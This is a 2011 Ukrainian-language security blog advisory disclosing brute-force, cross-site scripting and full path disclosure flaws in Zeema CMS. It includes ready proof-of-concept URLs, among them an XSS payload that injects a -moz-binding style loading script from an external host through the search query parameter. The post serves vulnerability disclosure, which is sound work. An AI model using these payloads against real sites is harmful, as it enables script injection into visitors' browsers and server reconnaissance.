Websecurity - Веб безпека

22.10.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Brute Force, Cross-Site Scripting та Full path disclosure уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Це частина з великої кількості уразливостей знайдених в даній CMS. Про інші дірки я розповім згодом. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

02.12.2011

Brute Force:

http://site/cms/

XSS:

http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)

Атака спрацює в браузерах Mozilla і Firefox.

Full path disclosure:

http://site/search/?page=10&query=site

Уразливі всі версії Zeema CMS.

This entry was posted on 17:27 02.12.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.